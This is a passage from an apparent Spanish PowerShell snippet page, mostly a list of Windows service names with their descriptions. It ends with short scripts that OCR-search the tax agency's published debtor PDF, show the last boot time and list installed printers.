hogar. Si se detiene o deshabilita este servicio, el equipo no podrá detectar otros grupos en el hogar y es posible que el grupo en el hogar no funcione correctamente. Se recomienda que no deje de ejecutar este servicio. HvHost: Proporciona una interfaz para que el hipervisor Hyper-V proporcione contadores de rendimiento por partición al sistema operativo del host. icssvc: Permite compartir una conexión de datos móviles con otro dispositivo. igfxCUIService2.0.0.0: Service for Intel(R) HD Graphics Control Panel IKEEXT: El servicio IKEEXT hospeda los módulos de creación de claves de Intercambio de claves por red (IKE) y protocolo de Internet autenticado (AuthIP). Estos módulos de creación de claves se usan para la autenticación y el intercambio de claves en el protocolo de seguridad de Internet (IPsec). Si se detiene o deshabilita el servicio IKEEXT, se deshabilitará el intercambio de claves IKE y AuthIP con equipos del mismo nivel. Normalmente, IPsec está configurado para usar IKE o AuthIP; es posible que detener o deshabilitar el servicio IKEEXT provoque errores de IPsec y ponga en peligro la seguridad del sistema. Se recomienda ejecutar el servicio IKEEXT. iphlpsvc: Proporciona conectividad de túnel mediante tecnologías de transición IPv6 (6to4, ISATAP, Proxy de puerto y Teredo) e IP-HTTPS. Si se detiene este servicio, el equipo no contará con los beneficios de conectividad mejorada que ofrecen estas tecnologías. irmon: Detecta otros dispositivos de infrarrojos dentro del alcance e inicia la aplicación de transferencia de archivos. Si detiene el servicio, la transferencia de archivos no funcionará. KeyIso: El servicio Aislamiento de claves CNG se hospeda en el proceso LSA. Proporciona aislamiento de proceso de claves para las claves privadas y las operaciones criptográficas asociadas según lo requiere el Criterio común. El servicio almacena y usa claves de larga duración en un proceso seguro que cumple los requisitos del Criterio común. KinectManagement: Provides management of Kinect devices through a COM server. Downloads Audio firmware on device connect. KinectMonitor: Manages the Kinect runtime and service KtmRm: Coordina transacciones entre el coordinador de transacciones distribuidas (MSDTC) y el administrador de transacciones de kernel (KTM). Si no es necesario, es recomendable que este servicio permanezca detenido. Si es necesario, tanto MSDTC como KTM iniciarán el servicio automáticamente. Si se deshabilita este servicio, cualquier transacción de MSDTC que interactúe con un administrador de transacciones de kernel no se podrá realizar y cualquier servicio que dependa explícitamente de él no podrá iniciarse. LanmanServer: Ofrece compatibilidad con uso compartido de archivos, impresoras y canalizaciones con nombres en la red para este equipo. Si se detiene el servicio, estas funciones no estarán disponibles. Si se deshabilita el servicio, no se podrá iniciar ninguno de los servicios que dependan explícitamente de él. LanmanWorkstation: Crea y mantiene conexiones de red de cliente con servidores remotos con el protocolo SMB. Si se detiene este servicio, las conexiones dejarán de estar disponibles. Si se deshabilita, no podrá iniciarse ningún servicio que dependa explícitamente de él. lfsvc: Este servicio supervisa la ubicación actual del sistema y administra geovallas (ubicación geográfica con eventos asociados). Si desactiva este servicio, las aplicaciones no podrán usar ni recibir notificaciones de geolocalización o geovallas. LicenseManager: Proporciona compatibilidad con infraestructuras para la Tienda Windows. Este servicio se inicia bajo demanda y, si se deshabilita, el contenido adquirido a través de Tienda Windows no funcionará correctamente. lltdsvc: Crea un mapa de red con información sobre la topología de dispositivos y de equipos (conectividad) y los metadatos que describen cada equipo y dispositivo. Si se deshabilita este servicio, el mapa de red no funcionará correctamente lmhosts: Proporciona compatibilidad para el servicio NetBIOS sobre TCP/IP (NetBT) y resolución de nombres NetBIOS para clientes de la red, lo que permite a los usuarios compartir archivos, imprimir e iniciar sesión en la red. Si se detiene este servicio, puede que estas funciones no estén disponibles. Si se deshabilita, los servicios que dependan implícitamente de él no se iniciarán. MapsBroker: Servicio de Windows para el acceso de las aplicaciones a los mapas descargados. Este servicio se inicia a petición de la aplicación que accede a los mapas descargados. Si se deshabilita este servicio, las aplicaciones no podrán tener acceso a los mapas. MpsSvc: Firewall de Windows ayuda a proteger su equipo al impedir que usuarios sin autorización obtengan acceso a su equipo a través de Internet o una red. MSDTC: Coordina las transacciones que abarcan varios administradores de recursos, como bases de datos, colas de mensajes y sistemas de archivos. Si se detiene este servicio, estas transacciones no podrán realizarse. Si se deshabilita el servicio, no se podrá iniciar ningún servicio que dependa específicamente de él. MSiSCSI: Administra las sesiones SCSI de Internet (iSCSI) desde este equipo hacia los dispositivos de destino iSCSI remotos. Si se detiene este servicio, el equipo no podrá iniciar sesión en los destinos iSCSI ni tener acceso a ellos. Si se deshabilita, todos los servicios que dependan explícitamente de él no se podrán iniciar. msiserver: Agrega, modifica y quita aplicaciones proporcionadas como paquetes de Windows Installer (*.msi, *.msp, *.appx). Si se deshabilita este servicio, no se podrá iniciar ninguno de los servicios que dependan explícitamente de él. NcaSvc: Proporciona notificación de estado de DirectAccess para componentes de UI NcbService: Conexiones de agentes que permiten que las aplicaciones de la Tienda Windows reciban notificaciones de Internet. NcdAutoSetup: El servicio Configuración automática de dispositivos conectados a la red supervisa e instala dispositivos calificados que se conectan a redes calificadas. Si se detiene o se deshabilita este servicio. Windows no podrá detectar e instalar automáticamente los dispositivos conectados a la red calificados. Los usuarios pueden agregar manualmente los dispositivos conectados a la red a un equipo mediante la interfaz de usuario. Netlogon: Mantiene un canal seguro entre el equipo y el controlador de dominio para autenticar usuarios y servicios. Si se detiene este servicio, puede que el equipo no autentique usuarios y servicios y que el controlador de dominio no pueda registrar los registros DNS. Si se deshabilita este servicio, los servicios que depende de él explícitamente no se podrán iniciar. Netman: Administra objetos en la carpeta Conexiones de red y acceso telefónico, donde se pueden ver conexiones de red de área local y remotas. netprofm: Identifica las redes a las que se conectó el equipo, recopila y almacena las propiedades de estas redes y notifica a las aplicaciones cuando estas propiedades cambian. NetTcpPortSharing: Ofrece la posibilidad de compartir puertos TCP a través del protocolo net.tcp. NgcCtnrSvc: Administra claves de identidad de usuario locales para autenticar al usuario en proveedores de identidad, así como tarjetas inteligentes virtuales del TPM. Si se deshabilita este servicio, no se podrá acceder a las claves de identidad de usuario locales y las tarjetas inteligentes virtuales del TPM. Te recomendamos que no configures este servicio. NgcSvc: Proporciona aislamiento de procesos de claves criptográficas usadas para autenticarse en los proveedores de identidades asociados de un usuario. Si se deshabilita este servicio, todos los usos y administración de estas claves dejarán de estar disponibles, lo cual incluye el inicio de sesión de máquina y el inicio de sesión único para aplicaciones y sitios web. Este servicio se inicia y detiene automáticamente. Es recomendable no reconfigurar el servicio. NlaSvc: Recopila y almacena información de configuración de la red y notifica a los programas cuando esta información se modifica. Si se detiene este servicio, es posible que la información de configuración no esté disponible. Si se deshabilita este servicio, no se iniciará ningún servicio que dependa de él de forma explícita. nsi: Este servicio entrega notificaciones de red (por ejemplo, interfaces agregadas/eliminadas, etc.) a los clientes en modo usuario. Si se detiene este servicio, se perderá la conectividad de la red. Si se deshabilita este servicio, no se iniciará ningún servicio que dependa de él de forma explícita. p2pimsvc: Proporciona servicios de identidad para los servicios de Protocolo de resolución de nombres de mismo nivel (PNRP) y Agrupación de punto a punto. Si se deshabilita, es posible que los servicios de Protocolo de resolución de nombres de mismo nivel (PNRP) y Agrupación de punto a punto no funcionen y que algunas aplicaciones, como Grupo Hogar y Asistencia remota, no funcionen correctamente. p2psvc: Permite la comunicación de varios participantes mediante Agrupación de punto a punto. Si se deshabilita, es posible que algunas aplicaciones, como Grupo Hogar, no funcionen. PcaSvc: Este servicio proporciona soporte al Asistente para la compatibilidad de programas (PCA). PCA supervisa los programas que instala y ejecuta el usuario, y detecta problemas de compatibilidad conocidos. Si se detiene este servicio, PCA no funcionará correctamente. PerfHost: Habilita a los usuarios remotos y los procesos de 64-bits consultar con los contadores de rendimiento proporcionados por las DLLs de 32-bits. Si este servicio se detuviera, solo los usuarios locales y los procesos de 32-bits podrán consultar con los contadores de rendimiento proporcionados por las DLLs de 32-bits. PhoneSvc: Administra el estado de telefonía en el dispositivo pla: Registros y alertas de rendimiento recopila información de rendimiento de equipos locales o remotos según parámetros programados configurados previamente y los escribe en un registro o activa una alerta. Si se detiene este servicio, no se recopilará información de rendimiento. Si se deshabilita, no se iniciarán los servicios que dependan de él explícitamente. PlugPlay: Habilita un equipo para que reconozca y adapte los cambios de hardware con el menor esfuerzo por parte del usuario. Si se detiene o deshabilita este servicio, el sistema se volverá inestable. PNRPAutoReg: Este servicio publica un nombre de equipo con el Protocolo de resolución de nombres de mismo nivel. La configuración se administra con el contexto netsh "p2p pnrp peer". PNRPsvc: Habilita la resolución de nombres del mismo nivel sin servidor a través de Internet mediante el Protocolo de resolución de nombres de mismo nivel (PNRP). Si se deshabilita, algunas aplicaciones de colaboración y de punto a punto, como Asistencia remota, pueden dejar de funcionar. PolicyAgent: El protocolo de seguridad de Internet (IPSec) admite la autenticación del mismo nivel de la red, la autenticación de orígenes de datos, la integridad de datos, la confidencialidad de datos (cifrado) y la protección de reproducción. Este servicio aplica las directivas IPSec creadas a través del complemento Directivas de seguridad IP o la herramienta de la línea de comandos "netsh ipsec". Si detiene este servicio, es posible que experimente problemas de conectividad de red si la directiva requiere que las conexiones usen IPSec. Además, la administración remota del Firewall de Windows no está disponible cuando se detiene este servicio. Power: Administra la directiva de energía y la entrega de notificaciones de dicha directiva. PrintNotify: Este servicio abre cuadros de diálogo personalizados de la impresora y administra notificaciones desde un servidor de impresión o una impresora remotos. Si lo desactiva, no podrá ver las extensiones ni las notificaciones de impresora. ProfSvc: Este servicio es responsable de cargar y descargar los perfiles de usuario. Si se detiene o se deshabilita, los usuarios no podrán iniciar ni cerrar la sesión, las aplicaciones pueden experimentar problemas para obtener los datos de los usuarios y no recibirán notificaciones de eventos de perfil los componentes registrados para recibirlas. QWAVE: Experiencia de calidad de audio y vídeo de Windows (qWave) es una plataforma de red para aplicaciones de transmisión de audio y vídeo (AV) por secuencias en redes domésticas IP. qWave mejora el rendimiento y confiabilidad de la transmisión de AV por secuencias al garantizar la calidad de servicio (QoS) para aplicaciones de AV en la red. Proporciona mecanismos para control de admisión, supervisión y cumplimiento en tiempo de ejecución, recopilación de comentarios acerca de aplicaciones y establecimiento de la prioridad del tráfico. RasAuto: Crea una conexión a una red remota siempre que un programa hace referencia a un nombre o dirección DNS o NetBIOS remoto. RasMan: Administra conexiones de acceso telefónico y de red privada virtual (VPN) desde este equipo a Internet u otras redes remotas. Si se deshabilita este servicio, no se iniciará ningún otro servicio que dependa de forma explícita de él. RemoteAccess: Ofrece servicios de enrutamiento a empresas en entornos de red de área local y extensa. RemoteRegistry: Habilita usuarios remotos para que modifiquen la configuración del Registro en este equipo. Si se detiene este servicio, cualquier usuario en este equipo puede modificar el Registro. Si este servicio está deshabilitado, cualquier servicio que explícitamente dependa de él no podrá iniciarse. RetailDemo: El servicio de prueba comercial controla la actividad del dispositivo mientras este esté en el modo de prueba comercial. RmSvc: Servicio de administración de radio y modo avión rpcapd: Allows to capture traffic on this machine from a remote machine. RpcEptMapper: Resuelve identificadores de interfaces RPC en extremos de transporte. Si se detiene o deshabilita este servicio, los programas que usen servicios de llamada a procedimiento remoto (RPC) no funcionarán correctamente. RpcLocator: En Windows 2003 y versiones anteriores de Windows, el servicio Ubicador de llamada a procedimiento remoto (RPC) administra la base de datos de servicio de nombres de RPC. En Windows Vista y versiones posteriores de Windows, este servicio no proporciona ninguna funcionalidad y solo está presente por motivos de compatibilidad con algunas aplicaciones. RpcSs: El servicio RPCSS es el Administrador de control de servicios para servidores COM y DCOM. Realiza solicitudes de activación de objetos, resoluciones del exportador de objetos y recolección distribuida de elementos no usados para servidores COM y DCOM. Si este servicio se detiene o se deshabilita, los programas que usen COM o DCOM no funcionarán correctamente. Por ello, es muy recomendable que ejecute el servicio RPCSS. SamSs: El inicio de este servicio indica a otros servicios que el Administrador de cuentas de seguridad (SAM) está listo para aceptar solicitudes. Si deshabilita este servicio, impedirá que se notifique a otros servicios del sistema cuándo está listo SAM, lo que a su vez puede provocar un error de inicio de dichos servicios. No debe deshabilitar este servicio. SCardSvr: Administra el acceso a tarjetas inteligentes leídas por el equipo. Si este servicio se detiene, el equipo no podrá leer las tarjetas inteligentes. Si este servicio está deshabilitado, cualquier servicio que explícitamente dependa de él no podrá iniciarse. ScDeviceEnum: Crea nodos de dispositivos de software para todos los lectores de tarjetas inteligentes accesibles a una sesión determinada. Si se deshabilita este servicio, las API de WinRT no podrán enumerar los lectores de tarjetas inteligentes. Schedule: Permite a un usuario configurar y programar tareas automáticas en este equipo. El servicio también hospeda varias tareas críticas para el sistema Windows. Si se detiene o deshabilita este servicio, estas tareas no se ejecutarán en sus horas programadas. Si se deshabilita este servicio, no podrá iniciarse ningún servicio que dependa de él de forma explícita. SCPolicySvc: Permite configurar el sistema para bloquear el escritorio del usuario al quitar la tarjeta inteligente. SDRSVC: Ofrece funcionalidad de Copias de seguridad y restauración de Windows. seclogon: Habilita procesos de inicio bajo credenciales alternadas. Si se detiene, este tipo de acceso de inicio de sesión no estará disponible. Si el servicio está deshabilitado, cualquiera de los servicios que dependan explícitamente de él, no se iniciaran. SENS: Supervisa los eventos de sistema y notifica a los suscriptores del sistema de eventos COM+ de estos eventos. SensorDataService: Entrega datos de varios sensores SensorService: Servicio para sensores que administra diferentes funciones de sensor. Administra la orientación de dispositivo simple (SDO) y el historial de los sensores. Carga el sensor SDO que notifica cambios en la orientación del dispositivo. Si se detiene o deshabilita este servicio, el sensor SDO no se carga y no funciona la rotación automática. También se detiene la recopilación de historial de los sensores. SensrSvc: Supervisa los diversos sensores para exponer los datos y adaptarse al sistema y el estado del usuario. Si se detiene o se deshabilita, el brillo de la pantalla no se adaptará a las condiciones de iluminación. Al detenerlo, probablemente también se vean afectadas otras características y funcionalidades. SessionEnv: El servicio Configuración de Escritorio remoto (RDCS) se encarga de todas las actividades de mantenimiento de sesiones y configuración relacionadas con Servicios de Escritorio remoto y Escritorio remoto que requieran el contexto SYSTEM. Entre ellas, se incluyen las carpetas temporales por sesión, los temas de Escritorio remoto y los certificados de Escritorio remoto. SharedAccess: Proporciona servicios de traducción de direcciones de red, direccionamiento, resolución de nombres y prevención de intrusiones para una red doméstica o de oficina pequeña. ShellHWDetection: Proporciona notificaciones sobre eventos de hardware AutoPlay. shpamsvc: Manages profiles and accounts on a SharedPC configured device smphost: Servicio host para el proveedor de administración de Espacios de almacenamiento de Microsoft. Si se detiene o deshabilita este servicio, Espacios de almacenamiento no se puede administrar. SmsRouter: Enruta mensajes en función de reglas para clientes concretos. SNMPTRAP: Recibe mensajes de captura generados por agentes locales o remotos del Servicio de Protocolo simple de administración de redes (SNMP) y retransmite los mensajes a programas de administración de SNMP que se ejecutan en este equipo. Si se detiene este servicio, los programas basados en SNMP en este equipo no recibirán mensajes de captura SNMP. Si se deshabilita este servicio, cualquier servicio que dependa explícitamente de él tendrá un error al iniciar. Spooler: Este servicio pone en cola los trabajos de impresión y administra la interacción con la impresora. Si lo desactiva, no podrá imprimir ni ver las impresoras. sppsvc: Habilita la descarga, instalación y aplicación de licencias digitales para Windows y aplicaciones para Windows. Si el servicio está deshabilitado, es posible que el sistema operativo y las aplicaciones bajo licencia se ejecuten en modo de notificación. Es muy recomendable no deshabilitar el servicio de protección de software. SSDPSRV: Detecta dispositivos y servicios en red que usan el protocolo de detección SSDP, como los dispositivos UPnP. También anuncia dispositivos y servicios SSDP que se ejecutan en el equipo local. Si se detiene este servicio, no se detectarán los dispositivos basados en SSDP. Si se deshabilita este servicio, no podrán iniciarse los servicios que dependan explícitamente del mismo. SstpSvc: Ofrece compatibilidad con el protocolo de túnel de sockets seguros (SSTP) para conectarse con equipos remotos usando VPN. Si se deshabilita este servicio, los usuarios no podrán usar SSTP para tener acceso a servidores remotos. StateRepository: Proporciona soporte a la infraestructura necesaria para el modelo de aplicación. stisvc: Proporciona servicios de adquisición de imágenes para escáneres y cámaras. StorSvc: Ofrece servicios de habilitación para la configuración de almacenamiento y la expansión del almacenamiento externo svsvc: Comprueba posibles daños en el sistema de archivos. swprv: Administra instantáneas de volumen basadas en software y tomadas por el Servicio de instantáneas de volumen. Si se detiene el servicio, no se podrán administrar las instantáneas de volumen basadas en software. Si se deshabilita el servicio, se producirá un error al iniciar cualquiera de los servicios que dependen explícitamente de él. SysMain: Mantiene y mejora el rendimiento del sistema a lo largo del tiempo. SystemEventsBroker: Coordina la ejecución de trabajo en segundo plano para la aplicación WinRT. Si se deshabilita o se detiene este servicio, el trabajo en segundo plano podría no activarse. TabletInputService: Habilita la funcionalidad de lápiz y entrada de lápiz del Panel de escritura a mano y teclado táctil TapiSrv: Ofrece compatibilidad con la API de telefonía (TAPI) para programas que controlan dispositivos de telefonía en el equipo local y, a través de la LAN, en servidores que también usan el servicio. TermService: Permite a los usuarios conectarse de forma interactiva a un equipo remoto. Escritorio remoto y el servidor host de sesión de Escritorio remoto dependen de este servicio. Para impedir el uso remoto de este equipo, desactive las casillas de la pestaña Acceso remoto, en el elemento Propiedades del sistema del Panel de control. Themes: Proporciona administración de temas de experiencia de usuario. TieringEngineService: Optimiza la colocación de los datos en capas de almacenamiento en todos los espacios de almacenamiento en capas del sistema. tiledatamodelsvc: Servidor de mosaico para actualizaciones de mosaicos. TimeBrokerSvc: Coordina la ejecución de trabajo en segundo plano para la aplicación WinRT. Si se deshabilita o se detiene este servicio, el trabajo en segundo plano podría no activarse. TrkWks: Mantiene los vínculos entre archivos NTFS dentro de un equipo o entre equipos de una red. TrustedInstaller: Habilita la instalación, modificación y eliminación de actualizaciones y componentes opcionales de Windows. Si este servicio está deshabilitado, es posible que no se puedan instalar o desinstalar correctamente las actualizaciones de Windows en este equipo. tzautoupdate: Establece la zona horaria del sistema automáticamente. UI0Detect: Habilita la notificación al usuario sobre la entrada de usuario para los servicios interactivos; esto habilita el acceso a los cuadros de diálogo creados por los servicios interactivos cuando aparecen. Si se detiene este servicio, dejarán de funcionar las notificaciones de cuadros de diálogo de nuevos servicios interactivos y es posible que no se pueda obtener acceso a los cuadros de diálogo de servicios interactivos. Si se deshabilita este servicio, dejarán de funcionar las notificaciones y el acceso a los cuadros de diálogo de nuevos servicios interactivos. UmRdpService: Permite la redirección de impresoras, unidades o puertos para conexiones RDP. upnphost: Permite que los dispositivos UPnP se hospeden en el equipo. Si se detiene el servicio, todos los dispositivos UPnP hospedados dejarán de funcionar y no se podrá agregar ningún dispositivo hospedado adicional. Si se deshabilita este servicio, no podrán iniciarse los servicios que dependan explícitamente del mismo. UserManager: El administrador de usuarios proporciona los componentes de tiempo de ejecución necesarios para la interacción con múltiples usuarios. Si se detiene este servicio, es posible que algunas aplicaciones no funcionen correctamente. VaultSvc: Proporciona un almacenamiento seguro y la recuperación de credenciales para usuarios, aplicaciones y paquetes de servicios de seguridad. vds: Proporciona servicios de administración para discos, volúmenes, sistemas de archivos y matrices de almacenamiento. vmicguestinterface: Proporciona una interfaz para que el host de Hyper-V interactúe con servicios específicos que se ejecutan en la máquina virtual. vmicheartbeat: Supervisa el estado de la máquina virtual mediante la notificación de un latido a intervalos regulares. Este servicio ayuda a identificar las máquinas virtuales en ejecución que dejaron de responder. vmickvpexchange: Ofrece un mecanismo para intercambiar datos entre la máquina virtual y el sistema operativo que se ejecuta en el equipo físico. vmicrdv: Proporciona una plataforma para la comunicación entre la máquina virtual y el sistema operativo que se ejecuta en el equipo físico. vmicshutdown: Ofrece un mecanismo para apagar el sistema operativo de esta máquina virtual desde las interfaces de administración del equipo físico. vmictimesync: Sincroniza la hora del sistema de esta máquina virtual con la hora del sistema del equipo físico. vmicvmsession: Proporciona un mecanismo para administrar la máquina virtual con PowerShell a través de una sesión de máquina virtual sin una red virtual. vmicvss: Coordina las comunicaciones que requieren el uso del Servicio de instantáneas de volumen para realizar copias de seguridad de las aplicaciones y los datos de esta máquina virtual desde el sistema operativo del equipo físico. VSS: Administra e implementa Instantáneas de volumen usadas para copias de seguridad y otros propósitos. Si este servicio se detiene, las instantáneas se deshabilitarán para la copia de seguridad y ésta generará un error. Si este servicio está deshabilitado, se producirá un error al iniciar cualquier servicio que explícitamente dependa de él. W32Time: Mantiene la sincronización de fecha y hora en todos los clientes y servidores de la red. Si se detiene este servicio, no estará disponible la sincronización de fecha y hora. Si se deshabilita este servicio, no se podrá iniciar ninguno de los servicios que dependen explícitamente de él. WalletService: Almacena objetos usados por los clientes de la cartera wbengine: Copias de seguridad de Windows usa el servicio WBENGINE para realizar operaciones de copia de seguridad y recuperación. Si el usuario detiene este servicio, es posible que se produzcan errores en la operación de copia de seguridad o de recuperación que se esté ejecutando. Si se deshabilita este servicio, es posible que se deshabiliten las operaciones de copia de seguridad y de recuperación que usan Copias de seguridad de Windows en este equipo. WbioSrvc: El Servicio biométrico de Windows proporciona a las aplicaciones cliente la posibilidad de capturar, comparar, manipular y almacenar datos biométricos sin obtener acceso directo a ninguna muestra ni hardware biométricos. El servicio se hospeda en un proceso SVCHOST con privilegios. Wcmsvc: Toma decisiones de conexión/desconexión automáticas en función de las opciones de conectividad de red disponibles actualmente para el equipo y permite administrar la conectividad de red basándose en la configuración de directivas de grupo. wcncsvc: WCNCSVC hospeda la configuración de Windows Connect Now, que es la implementación de Microsoft del protocolo WPS (Wi-Fi Protected Setup). Se usa para configurar las opciones de LAN inalámbrica para un punto de acceso (AP) o un dispositivo Wi-Fi. El servicio se inicia mediante programación cuando es necesario. WdiServiceHost: El Servicio de directivas de diagnóstico usa el Host del servicio de diagnóstico para hospedar los diagnósticos que deben ejecutarse en un contexto de Servicio local. Si se detiene este servicio, los diagnósticos que dependan de él dejarán de funcionar. WdiSystemHost: El Servicio de directivas de diagnóstico usa el Host de sistema de diagnóstico para hospedar los diagnósticos que deben ejecutarse en un contexto de Sistema local. Si se detiene este servicio, los diagnósticos que dependan de él dejarán de funcionar. WdNisSvc: Ayuda a proteger contra intentos de intrusión dirigidos a vulnerabilidades conocidas o recientemente descubiertas en protocolos de red WebClient: Habilita los programas basados en Windows para que creen, tengan acceso y modifiquen archivos basados en Internet. Si este servicio se detiene, estas funciones no estarán disponibles. Si este servicio está deshabilitado, cualquier servicio que explícitamente dependa de él no podrá iniciarse. Wecsvc: Este servicio administra suscripciones persistentes a eventos desde orígenes remotos que admiten el protocolo WS-Management. Esto incluye registros de eventos de Windows Vista, hardware y orígenes de eventos con la interfaz IPMI habilitada. El servicio almacena los eventos reenviados en un registro de eventos local. Si se detiene o deshabilita este servicio, no podrán crearse suscripciones de eventos y no podrán aceptarse los eventos reenviados. WEPHOSTSVC: El servicio host de proveedor de cifrado de Windows sirve como intermediario para proporcionar funcionalidades de cifrado de proveedores de cifrado de terceros a los procesos que necesitan evaluar y aplicar directivas EAS. Si lo detiene, se verán afectadas las comprobaciones de cumplimiento de EAS que han establecido las cuentas de correo conectadas wercplsupport: Este servicio proporciona ayuda para ver, enviar y borrar los informes de problemas del nivel de sistema para el panel de control de los Informes de problemas y soluciones. WerSvc: Permite informar de errores cuando los programas dejan de funcionar o responder y proporcionar las soluciones existentes. También permite generar registros para servicios de diagnóstico y reparación. Si se detiene este servicio, es posible que los informes de errores no funcionen correctamente y que los resultados de los servicios de diagnóstico y las reparaciones no se muestren. WiaRpc: Inicia aplicaciones asociadas con eventos de adquisición de imágenes estáticas. WinDefend: Ayuda a proteger a los usuarios contra malware y otro software potencialmente no deseado WinHttpAutoProxySvc: WinHTTP implementa la pila HTTP de cliente y proporciona a los programadores una API Win32 y un componente de automatización COM para enviar solicitudes HTTP y recibir respuestas. Además, WinHTTP ofrece compatibilidad con la detección automática de una configuración proxy mediante la implementación del protocolo de detección automática de proxy web (WPAD). Winmgmt: Proporciona una interfaz común y un modelo de objeto para tener acceso a la información de administración acerca de un sistema operativo, dispositivos, aplicaciones y servicios. Si se detiene este servicio, la mayoría del software basado en Windows no funcionará correctamente. Si este servicio está deshabilitado, cualquier servicio que explícitamente dependa de él no podrá iniciarse. WinRM: El servicio Administración remota de Windows (WinRM) implementa el protocolo WS-Management para la administración remota. WS-Management es un protocolo estándar de servicios web usado para la administración remota de software y hardware. El servicio WinRM escucha solicitudes de WS-Management y las procesa en la red. Para tal fin, debe configurarse con una escucha que use la herramienta de línea de comandos winrm.cmd o a través de la directiva de grupo. El servicio WinRM ofrece acceso a los datos WMI y, si está en ejecución, permite la recopilación y suscripción a eventos. Los mensajes WinRM usan HTTP y HTTPS como transporte. El servicio WinRM no depende de IIS pero está preconfigurado para compartir un puerto con IIS en el mismo equipo. El servicio WinRM reserva el prefijo de URL /wsman. Para evitar conflictos con IIS, los administradores deben asegurarse de que ningún sitio web hospedado en IIS use el prefijo de URL /wsman. WlanSvc: El servicio WLANSVC proporciona la lógica necesaria para configurar, detectar, conectarse y desconectarse de una red de área local inalámbrica (WLAN), tal y como se define en los estándares IEEE 802.11. También incluye la lógica necesaria para convertir el equipo en un punto de acceso de software de modo que otros dispositivos puedan conectarse a él de forma inalámbrica mediante un adaptador de WLAN compatible. Detener o deshabilitar el servicio WLANSVC hará que todos los adaptadores de WLAN del equipo sean inaccesibles desde la interfaz de usuario de red de Windows. Se recomienda encarecidamente mantener el servicio WLANSVC en ejecución si el equipo dispone de un adaptador de WLAN. wlidsvc: Permite al usuario iniciar sesión mediante los servicios de identidad de cuentas Microsoft. Si se detuvo este servicio, los usuarios no podrán iniciar sesión en el equipo con sus cuentas Microsoft. wmiApSrv: Proporciona información sobre la biblioteca de rendimiento de proveedores del servicio Instrumental de administración de Windows (WMI) a clientes de la red. Este servicio solo se ejecuta si el Ayudante de datos de rendimiento está activado. WMPNetworkSvc: Comparte las bibliotecas del Reproductor de Windows Media con otros dispositivos multimedia y reproductores en red mediante Plug and Play universal. workfolderssvc: Este servicio sincroniza archivos con el servidor de Carpetas de trabajo, lo que le permite usar los archivos en cualquiera de los equipos y dispositivos en los que configuró Carpetas de trabajo. WPDBusEnum: Exige el cumplimiento de directivas de grupo para dispositivos extraíbles de almacenamiento. Habilita aplicaciones como Windows Media Player y Asistente para importación de imágenes para transferir y sincronizador contenido mediante el uso de dispositivos de almacenamiento. WpnService: Este servicio se ejecuta en la sesión 0 y aloja el proveedor de conexión y la plataforma de notificaciones que administra la conexión entre el dispositivo y el servidor WNS. wscsvc: El servicio WSCSVC (Centro de seguridad de Windows) supervisa e informa acerca de la configuración de mantenimiento de seguridad del equipo. La configuración de mantenimiento incluye la configuración de firewall (activado o desactivado), antivirus (activado, desactivado o sin actualizar), anti spyware (activado, desactivado o sin actualizar), Windows Update (descargar e instalar actualizaciones automáticamente o manualmente), Control de cuentas de usuario (activado o desactivado) e Internet (recomendada o no recomendada). El servicio proporciona unas API de COM para que los fabricantes de software independientes puedan registrar el estado de sus productos en el servicio Centro de seguridad. La interfaz de usuario de Seguridad y mantenimiento usa el servicio para proporcionar alertas de la bandeja del sistema y una vista gráfica de los estados de mantenimiento de seguridad en el panel de control de Seguridad y mantenimiento. Protección de acceso a redes (NAP) usa el servicio para informar sobre los estados de mantenimiento de seguridad de los clientes al Servidor de directivas de redes de NAP para tomar decisiones de cuarentena de red. El servicio también tiene una API pública que permite a los consumidores externos recuperar mediante programación el estado de mantenimiento de seguridad agregado del sistema. WSearch: Proporciona indización de contenido, almacenamiento en caché de propiedades y resultados de búsqueda para archivos, correo electrónico y otro tipo de contenido. wuauserv: Habilita la detección, descarga e instalación de actualizaciones de Windows y otros programas. Si se deshabilita este servicio, los usuarios de este equipo no podrán usar Windows Update ni su función de actualización automática y los programas no podrán usar la API del Agente de Windows Update (WUA). wudfsvc: Crea y administra procesos de controlador en modo usuario. Este servicio no se puede detener. WwanSvc: Este servicio administra conexiones y adaptadores de módulos incrustados/de tarjeta de datos (GSM y CDMA) de banda ancha móvil mediante la configuración automática de redes. Se recomienda encarecidamente mantener este servicio en ejecución para obtener una mejor experiencia de usuario de los dispositivos de banda ancha móvil. XblAuthManager: Proporciona servicios de autenticación y autorización para interactuar con Xbox Live. Si se detiene este servicio puede que algunas aplicaciones no funcionen correctamente. XblGameSave: Este servicio sincroniza los datos guardados para los juegos que pueden guardarse en Xbox Live. Si se detiene el servicio, la partida guardada no se cargará a, o descargará desde, Xbox Live. XboxNetApiSvc: Este servicio presta soporte a la interfaz de programación de aplicaciones Windows.Networking.XboxLive. |
Buscar un nombre dentro de la lista de deudores publicada por la Agencia Tributaria (nueva versión)
(No Ratings Yet)Loading...1 2 3 4 5 6 7 8 9 10 11 12 13 | #Pasos para poder buscar un nombre dentro de la lista de deudores publicada por la Agencia Tributaria: #1. Descargar el PDF: https://www.agenciatributaria.gob.es/static_files/AEAT_Sede/NoIx/Listado_deudores_Art95bisLGT.pdf #2. Dividir el fichero PDF en páginas: https://www.splitpdf.com/es #3. Convertir cada página del PDF en PNG: https://www.jesusninoc.com/2015/12/27/convert-pdf-to-png/ #4. Convertir cada PNG en TXT: https://www.jesusninoc.com/2015/12/27/convert-png-to-text/ #5. Buscar una palabra dentro del TXT: Select-String ls 'D:\power\pdf\pdf\convertir\deudores' *.png | %{ $ficheropng=$_.FullName $ficherosin=$_.FullName.Replace('.png','') D:\power\tesseract-ocr-3.02-win32-portable\Tesseract-OCR\tesseract.exe $ficheropng $ficherosin gc $ficherosin'.txt' | Select-String 'moroso' } |
Hora y fecha del último arranque
(2 votes, average: 5.00 out of 5)Loading...1 | (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime |
List of installed printers
(3 votes, average: 5.00 out of 5)Loading...1 | (Get-WmiObject -Class Win32_Printer).Name |
Dividir una captura de pantalla en sectores
